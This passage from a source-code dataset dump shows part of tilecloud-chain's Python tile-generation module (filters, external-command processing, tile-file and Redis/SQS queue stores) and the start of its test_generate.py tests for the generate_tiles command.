metadata=tile.metadata))\n else:\n self.store.delete_one(tile)\n _LOGGER.info(\"The tile %s %s is dropped\", tile.tilecoord, tile.formated_metadata)\n if hasattr(tile, \"metatile\"):\n metatile: Tile = tile.metatile\n metatile.elapsed_togenerate -= 1 # type: ignore\n if metatile.elapsed_togenerate == 0 and self.queue_store is not None: # type: ignore\n self.queue_store.delete_one(metatile)\n elif self.queue_store is not None:\n self.queue_store.delete_one(tile)\n\n if self.count:\n self.count()\n\n return None\n\n\nclass MultiAction:\n \"\"\"\n Used to perform an action based on the tile's layer name.\n\n E.g a HashDropper or Process\n \"\"\"\n\n def __init__(\n self,\n get_action: Callable[[str, str], Optional[Callable[[Tile], Optional[Tile]]]],\n ) -> None:\n self.get_action = get_action\n self.actions: Dict[Tuple[str, str], Optional[Callable[[Tile], Optional[Tile]]]] = {}\n\n def __call__(self, tile: Tile) -> Optional[Tile]:\n layer = tile.metadata[\"layer\"]\n config_file = tile.metadata[\"config_file\"]\n action = self.actions.get((config_file, layer))\n if action is None:\n action = self.get_action(config_file, layer)\n self.actions[(config_file, layer)] = action\n if action:\n _LOGGER.debug(\"[%s] Run action %s.\", tile.tilecoord, action)\n return action(tile)\n return tile\n\n\nclass HashLogger:\n \"\"\"Log the tile size and hash.\"\"\"\n\n def __init__(self, block: str, out: Optional[IO[str]]) -> None:\n self.block = block\n self.out = out\n\n def __call__(self, tile: Tile) -> Tile:\n ref = None\n try:\n assert tile.data\n image = Image.open(BytesIO(tile.data))\n except OSError as ex:\n assert tile.data\n _LOGGER.exception(\"%s: %s\", str(ex), tile.data)\n raise\n for px in image.getdata():\n if ref is None:\n ref = px\n elif px != ref:\n _LOGGER.error(\"Error: image is not uniform.\")\n sys.exit(1)\n\n assert tile.data\n print(\n f\"\"\"Tile: {tile.tilecoord} {tile.formated_metadata}\n {self.block}:\n size: {len(tile.data)}\n hash: {sha1(tile.data).hexdigest()}\"\"\", # nosec\n file=self.out,\n )\n return tile\n\n\nclass LocalProcessFilter:\n \"\"\"\n Drop the tiles (coordinate) that shouldn't be generated in this process.\n\n Process 1: process tiles 0 of 3\n Process 2: process tiles 1 of 3\n Process 3: process tiles 2 of 3\n \"\"\"\n\n def __init__(self, nb_process: int, process_nb: int) -> None:\n self.nb_process = nb_process\n self.process_nb = int(process_nb)\n\n def filter(self, tilecoord: TileCoord) -> bool:\n nb = round(tilecoord.z + tilecoord.x / tilecoord.n + tilecoord.y / tilecoord.n)\n return nb % self.nb_process == self.process_nb\n\n def __call__(self, tile: Tile) -> Optional[Tile]:\n return tile if self.filter(tile.tilecoord) else None\n\n\nclass IntersectGeometryFilter:\n \"\"\"Drop the tiles (coordinates) it she didn't intersect the configured geom.\"\"\"\n\n def __init__(\n self,\n gene: TileGeneration,\n ) -> None:\n self.gene = gene\n\n def filter_tilecoord(\n self, config: DatedConfig, tilecoord: TileCoord, layer_name: str, host: Optional[str] = None\n ) -> bool:\n layer = config.config[\"layers\"][layer_name]\n grid_name = layer[\"grid\"]\n grid = config.config[\"grids\"][grid_name]\n tile_grid = self.gene.get_grid(config, grid_name)\n px_buffer = layer[\"px_buffer\"] + layer[\"meta_buffer\"] if layer[\"meta\"] else 0\n geoms = self.gene.get_geoms(config, layer_name, host=host)\n return self.bbox_polygon( # type: ignore\n tile_grid.extent(tilecoord, grid[\"resolutions\"][tilecoord.z] * px_buffer)\n ).intersects(geoms[tilecoord.z])\n\n def __call__(self, tile: Tile) -> Optional[Tile]:\n return (\n tile\n if self.filter_tilecoord(self.gene.get_tile_config(tile), tile.tilecoord, tile.metadata[\"layer\"])\n else None\n )\n\n @staticmethod\n def bbox_polygon(bbox: Tuple[float, float, float, float]) -> Polygon:\n return Polygon(((bbox[0], bbox[1]), (bbox[0], bbox[3]), (bbox[2], bbox[3]), (bbox[2], bbox[1])))\n\n\nclass DropEmpty:\n \"\"\"Create a filter for dropping all tiles with errors.\"\"\"\n\n def __init__(self, gene: TileGeneration) -> None:\n self.gene = gene\n\n def __call__(self, tile: Tile) -> Optional[Tile]:\n config = self.gene.get_tile_config(tile)\n if not tile or not tile.data:\n _LOGGER.error(\n \"The tile: %s%s is empty\",\n tile.tilecoord if tile else \"not defined\",\n \" \" + tile.formated_metadata if tile else \"\",\n )\n if \"error_file\" in config.config[\"generation\"] and tile:\n self.gene.log_tiles_error(tile=tile, message=\"The tile is empty\")\n return None\n else:\n return tile\n\n\ndef quote(arg: str) -> str:\n \"\"\"Add some quote and escape to pass the argument to an externa command.\"\"\"\n if \" \" in arg or \"'\" in arg or '\"' in arg:\n if \"'\" in arg:\n if '\"' in arg:\n formated_arg = arg.replace(\"'\", \"\\\\'\")\n return f\"'{formated_arg}'\"\n return f'\"{arg}\"'\n else:\n return f\"'{arg}'\"\n elif arg == \"\":\n return \"''\"\n else:\n return arg\n\n\ndef parse_tilecoord(string_representation: str) -> TileCoord:\n \"\"\"Parce the tile coordinates (z/x/y => TileCoord object).\"\"\"\n parts = string_representation.split(\":\")\n coords = [int(v) for v in parts[0].split(\"/\")]\n if len(coords) != 3:\n raise ValueError(\"Wrong number of coordinates\")\n z, x, y = coords\n if len(parts) == 1:\n tilecoord = TileCoord(z, x, y)\n elif len(parts) == 2:\n meta = parts[1].split(\"/\")\n if len(meta) != 2:\n raise ValueError(\"No one '/' in meta coordinates\")\n tilecoord = TileCoord(z, x, y, int(meta[0]))\n else:\n raise ValueError(\"More than on ':' in the tilecoord\")\n return tilecoord\n\n\nclass Process:\n \"\"\"Process a tile throw an external command.\"\"\"\n\n def __init__(self, config: tilecloud_chain.configuration.ProcessCommand, options: Namespace) -> None:\n self.config = config\n self.options = options\n\n def __call__(self, tile: Tile) -> Optional[Tile]:\n if tile and tile.data:\n fd_in, name_in = tempfile.mkstemp()\n with open(name_in, \"wb\") as file_in:\n file_in.write(tile.data)\n\n for cmd in self.config:\n args = []\n if (\n not self.options.verbose and not self.options.debug and not self.options.quiet\n ) and \"default\" in cmd[\"arg\"]:\n args.append(cmd[\"arg\"][\"default\"])\n if self.options.verbose and \"verbose\" in cmd[\"arg\"]:\n args.append(cmd[\"arg\"][\"verbose\"])\n if self.options.debug and \"debug\" in cmd[\"arg\"]:\n args.append(cmd[\"arg\"][\"debug\"])\n if self.options.quiet and \"quiet\" in cmd[\"arg\"]:\n args.append(cmd[\"arg\"][\"quiet\"])\n\n if cmd[\"need_out\"]:\n fd_out, name_out = tempfile.mkstemp()\n os.unlink(name_out)\n else:\n name_out = name_in\n\n command = cmd[\"cmd\"] % {\n \"in\": name_in,\n \"out\": name_out,\n \"args\": \" \".join(args),\n \"x\": tile.tilecoord.x,\n \"y\": tile.tilecoord.y,\n \"z\": tile.tilecoord.z,\n }\n _LOGGER.debug(\"[%s] process: %s\", tile.tilecoord, command)\n result = subprocess.run( # pylint: disable=subprocess-run-check\n command, shell=True, capture_output=True # nosec\n )\n if result.returncode != 0:\n tile.error = (\n f\"Command '{command}' on tile {tile.tilecoord} \"\n f\"return error code {result.returncode}:\\n{result.stderr!s}\\n{result.stdout!s}\"\n )\n tile.data = None\n return tile\n\n if cmd[\"need_out\"]:\n os.close(fd_in)\n os.remove(name_in)\n name_in = name_out\n fd_in = fd_out\n\n with open(name_in, \"rb\") as file_out:\n tile.data = file_out.read()\n os.close(fd_in)\n os.remove(name_in)\n\n return tile\n\n\nclass TilesFileStore(TileStore):\n \"\"\"Load tiles to be generate from a file.\"\"\"\n\n def __init__(self, tiles_file: str):\n super().__init__()\n\n self.tiles_file = open(tiles_file, encoding=\"utf-8\") # pylint: disable=consider-using-with\n\n def list(self) -> Iterator[Tile]:\n while True:\n line = self.tiles_file.readline()\n if not line:\n return\n line = line.split(\"#\")[0].strip()\n if line != \"\":\n splitted_line = line.split(\" \")\n try:\n tilecoord = parse_tilecoord(splitted_line[0])\n except ValueError as e:\n _LOGGER.exception(\n \"A tile '%s' is not in the format 'z/x/y' or z/x/y:+n/+n\\n%s\",\n line,\n repr(e),\n )\n continue\n\n yield Tile(\n tilecoord,\n metadata=dict([cast(Tuple[str, str], e.split(\"=\")) for e in splitted_line[1:]]),\n )\n\n\ndef _await_message(_: Any) -> bool:\n try:\n # Just sleep, the SQSTileStore will try again after that...\n time.sleep(10)\n return False\n except KeyboardInterrupt:\n raise StopIteration # pylint: disable=raise-missing-from\n\n\ndef get_queue_store(config: DatedConfig, daemon: bool) -> TimedTileStoreWrapper:\n \"\"\"Get the quue tile store (Redis or SQS).\"\"\"\n if \"redis\" in config.config:\n # Create a Redis queue\n conf = config.config[\"redis\"]\n tilestore_kwargs: Dict[str, Any] = {\n \"name\": conf[\"queue\"],\n \"stop_if_empty\": not daemon,\n \"timeout\": conf[\"timeout\"],\n \"pending_timeout\": conf[\"pending_timeout\"],\n \"max_retries\": conf[\"max_retries\"],\n \"max_errors_age\": conf[\"max_errors_age\"],\n \"max_errors_nb\": conf[\"max_errors_nb\"],\n \"connection_kwargs\": conf.get(\"connection_kwargs\", {}),\n \"sentinel_kwargs\": conf.get(\"sentinel_kwargs\"),\n }\n if \"socket_timeout\" in conf:\n tilestore_kwargs[\"connection_kwargs\"][\"socket_timeout\"] = conf[\"socket_timeout\"]\n if \"db\" in conf:\n tilestore_kwargs[\"connection_kwargs\"][\"db\"] = conf[\"db\"]\n if \"url\" in conf:\n tilestore_kwargs[\"url\"] = conf[\"url\"]\n else:\n tilestore_kwargs[\"sentinels\"] = conf[\"sentinels\"]\n tilestore_kwargs[\"service_name\"] = conf.get(\"service_name\", \"mymaster\")\n if \"pending_count\" in conf:\n tilestore_kwargs[\"pending_count\"] = conf[\"pending_count\"]\n if \"pending_max_count\" in conf:\n tilestore_kwargs[\"pending_max_count\"] = conf[\"pending_max_count\"]\n return TimedTileStoreWrapper(RedisTileStore(**tilestore_kwargs), store_name=\"redis\")\n else:\n # Create a SQS queue\n return TimedTileStoreWrapper(\n SQSTileStore(_get_sqs_queue(config), on_empty=_await_message if daemon else maybe_stop),\n store_name=\"SQS\",\n )\n\n\ndef _get_sqs_queue(\n config: DatedConfig,\n) -> \"botocore.client.SQS\":\n if \"sqs\" not in config.config:\n sys.exit(\"The config hasn't any configured queue\")\n sqs = boto3.resource(\"sqs\", region_name=config.config[\"sqs\"].get(\"region\", \"eu-west-1\"))\n return sqs.get_queue_by_name(QueueName=config.config[\"sqs\"][\"queue\"])\n" }, { "alpha_fraction": 0.4238554835319519, "alphanum_fraction": 0.4738631248474121, "avg_line_length": 38.872283935546875, "blob_id": "761cb8ab8fd13d9d49782e7f5b4a6f6818b4f3fa", "content_id": "ca395cfd48bf1629ed485636748c322704be392b", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 45893, "license_type": "permissive", "max_line_length": 133, "num_lines": 1151, "path": "/tilecloud_chain/tests/test_generate.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import os\nimport shutil\nfrom itertools import product, repeat\nfrom typing import List, Tuple\n\nimport pytest\nfrom testfixtures import LogCapture\n\nfrom tilecloud.store.redis import RedisTileStore\nfrom tilecloud_chain import controller, generate\nfrom tilecloud_chain.tests import CompareCase\n\n\nclass TestGenerate(CompareCase):\n def setUp(self) -> None: # noqa\n self.maxDiff = None\n\n @classmethod\n def setUpClass(cls): # noqa\n os.chdir(os.path.dirname(__file__))\n if os.path.exists(\"/tmp/tiles\"):\n shutil.rmtree(\"/tmp/tiles\")\n\n @classmethod\n def tearDownClass(cls): # noqa\n os.chdir(os.path.dirname(os.path.dirname(os.path.dirname(__file__))))\n if os.path.exists(\"/tmp/tiles\"):\n shutil.rmtree(\"/tmp/tiles\")\n\n def test_get_hash(self) -> None:\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n for d in (\"-d\", \"\"):\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_tiles {} --get-hash 4/0/0 \"\n \"-c tilegeneration/test.yaml -l point\".format(d),\n main_func=generate.main,\n expected=\"\"\"Tile: 4/0/0:+8/+8 config_file=tilegeneration/test.yaml dimension_DATE=2012 host=localhost layer=point\n empty_metatile_detection:\n size: 20743\n hash: 01062bb3b25dcead792d7824f9a7045f0dd92992\n Tile: 4/0/0 config_file=tilegeneration/test.yaml dimension_DATE=2012 host=localhost layer=point\n empty_tile_detection:\n size: 334\n hash: dd6cb45962bccb3ad2450ab07011ef88f766eda8\n \"\"\",\n )\n\n log_capture.check()\n\n def test_get_wrong_hash(self) -> None:\n for d in (\"-d\", \"-q\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_cmd_exit_equals(\n cmd=\".build/venv/bin/generate_tiles {} --get-hash 0/7/5 \"\n \"-c tilegeneration/test.yaml -l all\".format(d),\n main_func=generate.main,\n )\n log_capture.check(\n (\n \"tilecloud_chain\",\n \"ERROR\",\n \"Error: image is not uniform.\",\n )\n )\n\n def test_get_bbox(self) -> None:\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"-c tilegeneration/test.yaml --get-bbox 4/4/4 -l point\".format(d),\n main_func=generate.main,\n expected=\"\"\"Tile bounds: [425120,343600,426400,344880]\n\"\"\",\n )\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"-c tilegeneration/test.yaml --get-bbox 4/4/4:+1/+1 -l point\".format(d),\n main_func=generate.main,\n expected=\"\"\"Tile bounds: [425120,343600,426400,344880]\n \"\"\",\n )\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"-c tilegeneration/test.yaml --get-bbox 4/4/4:+2/+2 -l point\".format(d),\n main_func=generate.main,\n expected=\"\"\"Tile bounds: [425120,342320,427680,344880]\n \"\"\",\n )\n log_capture.check()\n\n @pytest.mark.skip(reason=\"Don't test mapnik\")\n def test_hash_mapnik(self):\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"--get-hash 4/0/0 -c tilegeneration/test.yaml -l mapnik\".format(d),\n main_func=generate.main,\n expected=\"\"\"Tile: 4/0/0 config_file=tilegeneration/test.yaml\n empty_tile_detection:\n size: 334\n hash: dd6cb45962bccb3ad2450ab07011ef88f766eda8\n \"\"\",\n )\n log_capture.check()\n\n def test_hash_mapnik_grid(self) -> None:\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"--get-hash 4/0/0 -c tilegeneration/test.yaml -l all\".format(d),\n main_func=generate.main,\n expected=\"\"\"Tile: 4/0/0 config_file=tilegeneration/test.yaml dimension_DATE=2012 host=localhost layer=all\n empty_metatile_detection:\n size: 334\n hash: dd6cb45962bccb3ad2450ab07011ef88f766eda8\n Tile: 4/0/0 config_file=tilegeneration/test.yaml dimension_DATE=2012 host=localhost layer=all\n empty_tile_detection:\n size: 334\n hash: dd6cb45962bccb3ad2450ab07011ef88f766eda8\n \"\"\",\n )\n log_capture.check()\n\n def test_test_all(self) -> None:\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_tiles_generated(\n cmd=f\".build/venv/bin/generate_tiles {d} -c tilegeneration/test-nosns.yaml -t 1\",\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/%s/default/2012/swissgrid_5/%i/%i/%i.png\",\n tiles=[\n (\"line\", 0, 5, 6),\n (\"line\", 0, 5, 7),\n (\"line\", 0, 6, 5),\n (\"line\", 0, 6, 6),\n (\"line\", 0, 7, 4),\n (\"line\", 0, 7, 5),\n (\"polygon\", 0, 5, 4),\n ],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'line \\(DATE=2012\\)' is finish\n Nb generated metatiles: 1\n Nb metatiles dropped: 0\n Nb generated tiles: 64\n Nb tiles dropped: 58\n Nb tiles stored: 6\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: 3.[0-9] Kio\n Time per tile: [0-9]+ ms\n Size per tile: 6[0-9][0-9] o\n\n The tile generation of layer 'polygon \\(DATE=2012\\)' is finish\n Nb generated tiles: 1\n Nb tiles dropped: 0\n Nb tiles stored: 1\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: [45][0-9][0-9] o\n Time per tile: [0-9]+ ms\n Size per tile: [45][0-9][0-9] o\n\n \"\"\",\n )\n log_capture.check()\n\n def test_test_dimensions(self) -> None:\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles %s -c tilegeneration/test-nosns.yaml -t 1 \"\n \"--dimensions DATE=2013\" % d,\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/%s/default/2013/swissgrid_5/%i/%i/%i.png\",\n tiles=[\n (\"line\", 0, 5, 6),\n (\"line\", 0, 5, 7),\n (\"line\", 0, 6, 5),\n (\"line\", 0, 6, 6),\n (\"line\", 0, 7, 4),\n (\"line\", 0, 7, 5),\n (\"polygon\", 0, 5, 4),\n ],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'line \\(DATE=2013\\)' is finish\n Nb generated metatiles: 1\n Nb metatiles dropped: 0\n Nb generated tiles: 64\n Nb tiles dropped: 58\n Nb tiles stored: 6\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: 3.[0-9] Kio\n Time per tile: [0-9]+ ms\n Size per tile: 6[0-9][0-9] o\n\n The tile generation of layer 'polygon \\(DATE=2013\\)' is finish\n Nb generated tiles: 1\n Nb tiles dropped: 0\n Nb tiles stored: 1\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: [45][0-9][0-9] o\n Time per tile: [0-9]+ ms\n Size per tile: [45][0-9][0-9] o\n\n \"\"\",\n )\n log_capture.check()\n\n def test_multigeom(self) -> None:\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles -c tilegeneration/test-multigeom.yaml\",\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/pp/default/2012/swissgrid_5/%i/%i/%i.png\",\n tiles=[\n (0, 5, 4),\n (0, 5, 5),\n (0, 5, 6),\n (0, 5, 7),\n (0, 6, 4),\n (0, 6, 5),\n (0, 6, 6),\n (0, 6, 7),\n (0, 7, 4),\n (0, 7, 5),\n (0, 7, 6),\n (0, 7, 7),\n (1, 11, 8),\n (1, 11, 9),\n (1, 11, 10),\n (1, 11, 11),\n (1, 11, 12),\n (1, 11, 13),\n (1, 11, 14),\n (1, 12, 8),\n (1, 12, 9),\n (1, 12, 10),\n (1, 12, 11),\n (1, 12, 12),\n (1, 12, 13),\n (1, 12, 14),\n (1, 13, 8),\n (1, 13, 9),\n (1, 13, 10),\n (1, 13, 11),\n (1, 13, 12),\n (1, 13, 13),\n (1, 13, 14),\n (1, 14, 8),\n (1, 14, 9),\n (1, 14, 10),\n (1, 14, 11),\n (1, 14, 12),\n (1, 14, 13),\n (1, 14, 14),\n (1, 15, 8),\n (1, 15, 9),\n (1, 15, 10),\n (1, 15, 11),\n (1, 15, 12),\n (1, 15, 13),\n (1, 15, 14),\n (2, 29, 35),\n (2, 39, 21),\n (3, 78, 42),\n (3, 58, 70),\n ],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'pp \\(DATE=2012\\)' is finish\n Nb generated tiles: 51\n Nb tiles dropped: 0\n Nb tiles stored: 51\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: [34][0-9] Kio\n Time per tile: [0-9]+ ms\n Size per tile: [79][0-9][0-9] o\n\n \"\"\",\n )\n log_capture.check()\n\n def test_zoom_identifier(self) -> None:\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n xy = list(product(range(585, 592), range(429, 432)))\n x = [e[0] for e in xy]\n y = [e[1] for e in xy]\n xy2 = list(product(range(2929, 2936), range(2148, 2152)))\n x2 = [e[0] for e in xy2]\n y2 = [e[1] for e in xy2]\n xy3 = list(product(range(5859, 5864), range(4296, 4304)))\n x3 = [e[0] for e in xy3]\n y3 = [e[1] for e in xy3]\n for d in (\"-d\", \"\"):\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"-c tilegeneration/test-nosns.yaml -t 1 -l polygon2 -z 0\".format(d),\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/%s/default/2012/swissgrid_01/%s/%i/%i.png\",\n tiles=list(zip(repeat(\"polygon2\", len(x)), repeat(\"1\", len(x)), x, y)),\n regex=True,\n expected=r\"\"\"The tile generation of layer 'polygon2 \\(DATE=2012\\)' is finish\n Nb generated metatiles: 1\n Nb metatiles dropped: 0\n Nb generated tiles: 64\n Nb tiles dropped: 43\n Nb tiles stored: 21\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: 16 Kio\n Time per tile: [0-9]+ ms\n Size per tile: 788 o\n\n \"\"\",\n )\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"-c tilegeneration/test-nosns.yaml -t 1 -l polygon2 -z 1\".format(d),\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/%s/default/2012/swissgrid_01/%s/%i/%i.png\",\n tiles=list(zip(repeat(\"polygon2\", len(x2)), repeat(\"0_2\", len(x2)), x2, y2)),\n regex=True,\n expected=r\"\"\"The tile generation of layer 'polygon2 \\(DATE=2012\\)' is finish\n Nb generated metatiles: 1\n Nb metatiles dropped: 0\n Nb generated tiles: 64\n Nb tiles dropped: 36\n Nb tiles stored: 28\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: 22 Kio\n Time per tile: [0-9]+ ms\n Size per tile: 806 o\n\n \"\"\",\n )\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"-c tilegeneration/test-nosns.yaml -t 1 -l polygon2 -z 2\".format(d),\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/%s/default/2012/swissgrid_01/%s/%i/%i.png\",\n tiles=list(zip(repeat(\"polygon2\", len(x3)), repeat(\"0_1\", len(x3)), x3, y3)),\n regex=True,\n expected=r\"\"\"The tile generation of layer 'polygon2 \\(DATE=2012\\)' is finish\n Nb generated metatiles: 1\n Nb metatiles dropped: 0\n Nb generated tiles: 64\n Nb tiles dropped: 24\n Nb tiles stored: 40\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: 32 Kio\n Time per tile: [0-9]+ ms\n Size per tile: 818 o\n\n \"\"\",\n )\n log_capture.check()\n\n def test_empty_bbox(self) -> None:\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles %s -c tilegeneration/test-nosns.yaml \"\n \"-l point_hash --bbox 700000 250000 800000 300000\" % d,\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/%s\",\n tiles=[],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'point_hash \\(DATE=2012\\)' is finish\n Nb generated metatiles: 0\n Nb metatiles dropped: 0\n Nb generated tiles: 0\n Nb tiles dropped: 0\n Nb tiles stored: 0\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n\n \"\"\",\n )\n # Second time for the debug mode\n log_capture.check(\n (\"tilecloud_chain\", \"WARNING\", \"bounds empty for zoom 0\"),\n (\"tilecloud_chain\", \"WARNING\", \"bounds empty for zoom 1\"),\n (\"tilecloud_chain\", \"WARNING\", \"bounds empty for zoom 2\"),\n (\"tilecloud_chain\", \"WARNING\", \"bounds empty for zoom 3\"),\n )\n\n def test_zoom(self) -> None:\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"-c tilegeneration/test-nosns.yaml -l point_hash --zoom 1\".format(d),\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/%s/default/2012/swissgrid_5/%i/%i/%i.png\",\n tiles=[(\"point_hash\", 1, 11, 14), (\"point_hash\", 1, 15, 8)],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'point_hash \\(DATE=2012\\)' is finish\n Nb generated metatiles: 1\n Nb metatiles dropped: 0\n Nb generated tiles: 64\n Nb tiles dropped: 62\n Nb tiles stored: 2\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: [89][0-9][0-9] o\n Time per tile: [0-9]+ ms\n Size per tile: 4[0-9][0-9] o\n\n \"\"\",\n )\n log_capture.check()\n\n def test_zoom_range(self) -> None:\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"-c tilegeneration/test-nosns.yaml -l point_hash --zoom 1-3\".format(d),\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/%s/default/2012/swissgrid_5/%i/%i/%i.png\",\n tiles=[\n (\"point_hash\", 1, 11, 14),\n (\"point_hash\", 1, 15, 8),\n (\"point_hash\", 2, 29, 35),\n (\"point_hash\", 2, 39, 21),\n (\"point_hash\", 3, 58, 70),\n (\"point_hash\", 3, 78, 42),\n ],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'point_hash \\(DATE=2012\\)' is finish\n Nb generated metatiles: 9\n Nb metatiles dropped: 4\n Nb generated tiles: 320\n Nb tiles dropped: 314\n Nb tiles stored: 6\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: 2.[0-9] Kio\n Time per tile: [0-9]+ ms\n Size per tile: 4[0-9][0-9] o\n\n \"\"\",\n )\n log_capture.check()\n\n def test_no_zoom(self) -> None:\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_tiles_generated(\n cmd=(\n \".build/venv/bin/generate_tiles {} -c tilegeneration/test-nosns.yaml -l point_hash\"\n ).format(d),\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/%s/default/2012/swissgrid_5/%i/%i/%i.png\",\n tiles=[\n (\"point_hash\", 0, 5, 7),\n (\"point_hash\", 0, 7, 4),\n (\"point_hash\", 1, 11, 14),\n (\"point_hash\", 1, 15, 8),\n (\"point_hash\", 2, 29, 35),\n (\"point_hash\", 2, 39, 21),\n (\"point_hash\", 3, 58, 70),\n (\"point_hash\", 3, 78, 42),\n ],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'point_hash \\(DATE=2012\\)' is finish\n Nb generated metatiles: 10\n Nb metatiles dropped: 4\n Nb generated tiles: 384\n Nb tiles dropped: 376\n Nb tiles stored: 8\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: 3.[0-9] Kio\n Time per tile: [0-9]+ ms\n Size per tile: 4[0-9][0-9] o\n\n \"\"\",\n )\n log_capture.check()\n\n def test_py_buffer(self) -> None:\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles %s -c tilegeneration/test-nosns.yaml \"\n \"-l point_px_buffer --zoom 0-2\" % d,\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/point_px_buffer/default/2012/swissgrid_5/%i/%i/%i.png\",\n tiles=[(0, 5, 7), (0, 7, 4), (1, 11, 14), (1, 15, 8), (2, 29, 35), (2, 39, 21)],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'point_px_buffer \\(DATE=2012\\)' is finish\n Nb generated metatiles: 10\n Nb metatiles dropped: 4\n Nb generated tiles: 384\n Nb tiles dropped: 378\n Nb tiles stored: 6\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: 2.[0-9] Kio\n Time per tile: [0-9]+ ms\n Size per tile: 4[0-9][0-9] o\n\n \"\"\",\n )\n log_capture.check()\n\n def test_zoom_list(self) -> None:\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_tiles_generated(\n cmd=(\n \".build/venv/bin/generate_tiles %s -c tilegeneration/test-nosns.yaml \"\n \"-l point_hash --zoom 0,2,3\" % d\n ),\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/%s/default/2012/swissgrid_5/%i/%i/%i.png\",\n tiles=[\n (\"point_hash\", 0, 5, 7),\n (\"point_hash\", 0, 7, 4),\n (\"point_hash\", 2, 29, 35),\n (\"point_hash\", 2, 39, 21),\n (\"point_hash\", 3, 58, 70),\n (\"point_hash\", 3, 78, 42),\n ],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'point_hash \\(DATE=2012\\)' is finish\n Nb generated metatiles: 9\n Nb metatiles dropped: 4\n Nb generated tiles: 320\n Nb tiles dropped: 314\n Nb tiles stored: 6\n Nb tiles in error: 